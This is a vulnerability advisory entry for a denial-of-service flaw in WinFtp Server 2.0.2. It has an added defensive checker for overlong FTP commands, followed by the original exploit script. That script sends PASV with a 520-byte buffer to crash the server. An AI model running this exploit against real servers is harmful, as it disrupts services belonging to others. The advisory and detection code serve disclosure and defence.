WinFtp Server Long Command Denial of Service

Vulnerability ID: 1111802
Vulnerability type: Unknown
Published: 2006-12-19
Updated: 2006-12-20
CVE ID: CVE-2006-6673
CNNVD-ID: CNNVD-200612-446
Platform: Windows
CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/2952
https://www.securityfocus.com/bid/87242
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-446
|Vulnerability details
In WinFtp Server 2.0.2, remote attackers can cause a denial of service (crash) via a long (1) PASV, (2) LIST, (3) USER, (4) PORT, and possibly other commands.
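
A defensive counterpart to the description above, as an added example that is not part of the original entry: a Python 3 check over reassembled FTP control-channel bytes that flags overlong command lines and arguments that violate RFC 959 syntax (PASV with an argument, malformed PORT). The 256-byte limit, the function names and the sample session are assumptions constructed for illustration.

```python
MAX_LINE = 256            # assumed policy limit, not a value from the advisory
NO_ARG_VERBS = {b"PASV"}  # RFC 959 defines PASV without an argument

def valid_port_arg(arg: bytes) -> bool:
    """RFC 959 PORT argument: h1,h2,h3,h4,p1,p2, each a decimal octet."""
    parts = arg.split(b",")
    return len(parts) == 6 and all(p.isdigit() and int(p) <= 255 for p in parts)

def check_command(line: bytes) -> list:
    """Return the findings for one command line (without its CRLF)."""
    findings = []
    if len(line) > MAX_LINE:
        findings.append("overlong-line")
    verb, _, arg = line.partition(b" ")
    verb = verb.upper()
    if verb in NO_ARG_VERBS and arg:
        findings.append("unexpected-argument")
    if verb == b"PORT" and not valid_port_arg(arg):
        findings.append("malformed-port-argument")
    return findings

def scan_stream(stream: bytes) -> list:
    """Check every command in a reassembled client-to-server byte stream.

    Returns (verb, line_length, findings) for each flagged line. A trailing
    fragment with no CRLF is checked too, so an oversized command is reported
    even if the sender never terminates it.
    """
    alerts = []
    for line in stream.split(b"\r\n"):
        if not line:
            continue
        findings = check_command(line)
        if findings:
            verb = line.partition(b" ")[0].upper()[:16].decode("ascii", "replace")
            alerts.append((verb, len(line), findings))
    return alerts

# Constructed sample session (not captured traffic): two benign commands,
# a PASV carrying a 520-byte argument, a valid PORT and a malformed PORT.
SAMPLE = (b"USER test\r\nPASS test\r\n"
          b"PASV " + b"A" * 520 + b"\r\n"
          b"PORT 127,0,0,1,4,1\r\n"
          b"PORT 127,0,0,1\r\n")

if __name__ == "__main__":
    for alert in scan_stream(SAMPLE):
        print(alert)
```

The same checks can sit in an FTP-aware proxy in front of the server, rejecting a flagged line before it reaches the command parser.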
|Exploit (EXP)
import sys,os,string
import socket
import struct
import time

print "-----------------------------------------------------------------------"
print "# WinFtp Server Version 2.0.2 Denial of Service"
print "# url: http://www.wftpserver.com/"
print "# author: shinnai"
print "# mail: shinnai[at]autistici[dot[org]"
print "# site: http://shinnai.altervista.org"
print "# soundtrack: Territorial pissing (by Nirvana)"
print "# you can choose one of all ftp commands implemented :)"
print "-----------------------------------------------------------------------"



buffer = "A" * 520
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
   conn = s.connect(("127.0.0.1",21))
except:
   print "- Unable to connect. exiting."
   sys.exit(1)

d = s.recv(1024)
time.sleep(2)
s.send('USER %s\r\n' % "test")
time.sleep(2)
s.send('PASS %s\r\n' % "test")
time.sleep(2)
s.send('PASV %s\r\n' % buffer) #You can change PASV with LIST, USER, PORT, etc...
time.sleep(2)

# milw0rm.com [2006-12-19]
|Affected products
Winftp Server Winftp Server 2.0.2
|References

Source: MILW0RM
Name: 2952
Link: http://www.milw0rm.com/exploits/2952
Source: VUPEN
Name: ADV-2006-5069
Link: http://www.frsirt.com/english/advisories/2006/5069
Source: SECUNIA
Name: 23412
Link: http://secunia.com/advisories/23412
Source: MILW0RM
Name: 2952
Link: http://milw0rm.com/exploits/2952